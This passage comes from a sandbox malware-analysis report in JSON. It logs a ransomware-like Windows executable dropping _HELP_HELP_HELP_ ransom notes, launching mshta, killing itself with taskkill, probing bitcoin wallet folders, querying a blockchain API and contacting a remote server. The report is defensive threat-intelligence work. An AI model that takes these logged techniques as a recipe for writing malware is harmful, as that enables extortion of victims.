%APPDATA%\\Microsoft\\Speech\\Files\\UserLexicons\\ (UID: 00000000-00003064)\n \"mshta.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003044)\n \"mshta.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00003044)\n \"mshta.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00003044)\n \"mshta.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003044)\n \"mshta.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00003044)\n \"mshta.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00003044)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\mshta.exe\" \"%USERPROFILE%\\Desktop\\_HELP_HELP_HELP_QNTKK6_.hta\"\" - (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system32\\cmd.exe\" - (UID: 00000000-00003064)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"taskkill /f /im \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\"\" - (UID: 00000000-00003404)\n \"cmd.exe\" called \"CreateProcessW\" with parameter \"ping -n 1 <IPv4>\" - (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76820000\n \"mshta.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76820000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76820000\n \"taskkill.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76820000\n \"PING.EXE\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76820000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,mov\tecx, esp,sub\tesp, 0x54,mov\teax, 0x20,sub\tesp, 4,mov\tdword ptr [esp], 0x40ae8d,sub\tesp, 4,mov\tdword ptr [esp], 0x40ae81,call\tdword ptr [0x4060e0],mov\tebx, dword ptr [0x40aee5],push\tebx,call\tdword ptr [0x4060c4],lea\tebx, [0x403295],call\tebx,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,lea\tebx, [0x403537],call\tebx,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,lea\tedx, [0x403537],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"mshta.exe\" failed to load missing module \"%WINDIR%\\System32\\DXGIDebug.dll\" - [base:0; Status:c0000135]\n \"mshta.exe\" failed to load missing module \"%WINDIR%\\system32\\DXGIDebug.dll\" - [base:0; Status:c0000135]\n \"mshta.exe\" failed to load missing module \"api-ms-win-core-winrt-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"PING.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"PING.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"mshta.exe\" with commandline \"\"%USERPROFILE%\\\\Desktop\\\\_HELP_HELP_HELP_QNTKK6_.hta\"\" (UID: 00000000-00003044)\n Spawned process \"cmd.exe\" (UID: 00000000-00003404)\n Spawned process \"taskkill.exe\" with commandline \"taskkill /f /im \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6 ...\" (UID: 00000000-00002988), Spawned process \"PING.EXE\" with commandline \"ping -n 1 <IPv4>\" (UID: 00000000-00002080)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"mshta.exe\" with commandline \"\"%USERPROFILE%\\\\Desktop\\\\_HELP_HELP_HELP_QNTKK6_.hta\"\" (UID: 00000000-00003044)\n Spawned process \"cmd.exe\" (UID: 00000000-00003404)\n Spawned process \"taskkill.exe\" with commandline \"taskkill /f /im \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6 ...\" (UID: 00000000-00002988), Spawned process \"PING.EXE\" with commandline \"ping -n 1 <IPv4>\" (UID: 00000000-00002080)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"taskkill.exe\" (UID: 00000000-00002988) was launched with new environment variables: \"PROMPT=\"$P$G\"\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" was detected as \"MASM32\" and name: \"Compiler\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" has flags like IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"\n \"<IPv4>:6892\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"api.blockcypher.com\"\n \"c.pki.goog\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /v1/btc/main/addrs/17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt?_=1738935597294 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: api.blockcypher.com\nConnection: Keep-Alive\" Response ==> HTTP/1.1 403 Forbidden\nDate: Fri\n 07 Feb 2025 13:30:09 GMT\nContent-Type: application/json\nTransfer-Encoding: chunked\nConnection: keep-alive\nAccess-Control-Allow-Headers: Origin\n X-Requested-With\n Content-Type\n Accept\nAccess-Control-Allow-Methods: GET\n POST\n PUT\n DELETE\nAccess-Control-Allow-Origin: *\nX-Ratelimit-Remaining: 1\ncf-cache-status: DYNAMIC\nServer: cloudflare\nCF-RAY: 90e3bb9f4ec967fe-SJC\nContent-Encoding: gzip with response body ==>36320D0A1F8B0800000000000003AA564A2D2ACA2F52B25250724C49294A2D2E5630344F4F31CC2D2E3075CBF34D76F57533F4CD2C09F10B2E8E2C362F37770C.......\n \"GET /r/gsr1.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: c.pki.goog\" Response ==> HTTP/1.1 200 OK\nAccept-Ranges: bytes\nContent-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts\nCross-Origin-Resource-Policy: cross-origin\nCross-Origin-Opener-Policy: same-origin; report-to=\"cacerts\"\nReport-To: {\"group\":\"cacerts\"\n\"max_age\":2592000\n\"endpoints\":[{\"url\":\"https://csp.withgoogle.com/csp/report-to/cacerts\"}]}\nContent-Length: 1739\nX-Content-Type-Options: nosniff\nServer: sffe\nX-XSS-Protection: 0\nDate: Fri\n 07 Feb 2025 12:49:24 GMT\nExpires: Fri\n 07 Feb 2025 13:39:24 GMT\nCache-Control: public\n max-age=3000\nAge: 2457\nLast-Modified: Tue\n 07 Jan 2025 07:28:00 GMT\nContent-Type: application/pkix-crl\nVary: Accept-Encoding with response body ==>308206C7308205AF020101300D06092A864886F70D01010B05003057310B300906035504061302424531193017060355040A1310476C6F62616C5369676E206E.......\n \"GET /r/r4.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: c.pki.goog\" Response ==> HTTP/1.1 200 OK\nAccept-Ranges: bytes\nContent-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts\nCross-Origin-Resource-Policy: cross-origin\nCross-Origin-Opener-Policy: same-origin; report-to=\"cacerts\"\nReport-To: {\"group\":\"cacerts\"\n\"max_age\":2592000\n\"endpoints\":[{\"url\":\"https://csp.withgoogle.com/csp/report-to/cacerts\"}]}\nContent-Length: 436\nX-Content-Type-Options: nosniff\nServer: sffe\nX-XSS-Protection: 0\nDate: Fri\n 07 Feb 2025 12:49:28 GMT\nExpires: Fri\n 07 Feb 2025 13:39:28 GMT\nCache-Control: public\n max-age=3000\nAge: 2454\nLast-Modified: Thu\n 25 Jul 2024 14:48:00 GMT\nContent-Type: application/pkix-crl\nVary: Accept-Encoding with response body ==>308201B030820137020101300A06082A8648CE3D0403033047310B300906035504061302555331223020060355040A1319476F6F676C65205472757374205365.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"api.blockcypher.com\"\n \"bitaps.com\"\n \"btc.blockr.io\"\n \"c.pki.goog\"\n \"chain.so\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-56", "type": 8, "name": "Drops files with image extension", "description": "\"_HELP_HELP_HELP_BRYBO0X_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"\n \"tmpBDC4.bmp\" has type \"PC bitmap Windows 3.x format 1280 x 1024 x 32 image size 5242880 cbSize 5242934 bits offset 54\" and extension \"bmp\"\n \"_HELP_HELP_HELP_PM6VQ_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"\n \"_HELP_HELP_HELP_EFSR87_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"\n \"_HELP_HELP_HELP_286I_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"\n \"_HELP_HELP_HELP_IPRMBH_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"\n \"_HELP_HELP_HELP_VNX7B_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"\n \"_HELP_HELP_HELP_CJ4QR38_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"\n \"_HELP_HELP_HELP_SJITSQ0_.png\" has type \"PNG image data 1280 x 1024 8-bit/color RGBA non-interlaced\" and extension \"png\"", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"_HELP_HELP_HELP_BRYBO0X_.png\" - Location: [%APPDATA%\\Microsoft\\Outlook\\_HELP_HELP_HELP_BRYBO0X_.png]- [targetUID: 00000000-00003064]\n Dropped file: \"winword.exe_Rules.xml\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\winword.exe_Rules.xml]- [targetUID: 00000000-00003064]\n Dropped file: \"officeclicktorun.exe_Rules.xml\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officeclicktorun.exe_Rules.xml]- [targetUID: 00000000-00003064]\n Dropped file: \"officec2rclient.exe_Rules.xml\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\officec2rclient.exe_Rules.xml]- [targetUID: 00000000-00003064]\n Dropped file: \"setup32.exe_Rules.xml\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\setup32.exe_Rules.xml]- [targetUID: 00000000-00003064]\n Dropped file: \"Outlook.srs\" - Location: [%APPDATA%\\Microsoft\\Outlook\\Outlook.srs]- [targetUID: 00000000-00003064]\n Dropped file: \"SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat\" - Location: [%APPDATA%\\Microsoft\\Speech\\Files\\UserLexicons\\SP_C75885D03A584C7FB5C3FE09D9DECBC9.dat]- [targetUID: 00000000-00003064]\n Dropped file: \"_HELP_HELP_HELP_K7FG_.hta\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_K7FG_.hta]- [targetUID: 00000000-00003064]\n Dropped file: \"_HELP_HELP_HELP_RASBJ_.hta\" - Location: [%APPDATA%\\Microsoft\\Outlook\\_HELP_HELP_HELP_RASBJ_.hta]- [targetUID: 00000000-00003064]\n Dropped file: \"_HELP_HELP_HELP_CJ4QR38_.png\" - Location: [%LOCALAPPDATA%\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_CJ4QR38_.png]- [targetUID: 00000000-00003064]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\shimeng.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\APPHELP.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\wtsapi32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\rsaenh.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\cmpbk32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\cmutil.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\VERSION.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\midimap.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\mpr.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\netapi32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\netutils.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\srvcli.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\wkscli.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\powrprof.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"mshta.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\shimeng.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\shimeng.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\APPHELP.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\APPHELP.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\wtsapi32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\wtsapi32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\rsaenh.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\rsaenh.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\cmpbk32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\cmpbk32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\cmutil.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\cmutil.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\VERSION.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\VERSION.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\橢桥捣牰潯楢扥昀煰污浣浤煣浨晵a\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe.Local\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\733c94c5\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\desktop.ini\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\program files\\bitcoin\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\program files\\bitcoin\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\programdata\\bitcoin\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\programdata\\bitcoin\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\bitcoin\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\bitcoin\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\roaming\\bitcoin\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file \"c:\\windows\\serviceprofiles\\localservice\\appdata\\roaming\\bitcoin\\\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" trying to access non-existent file 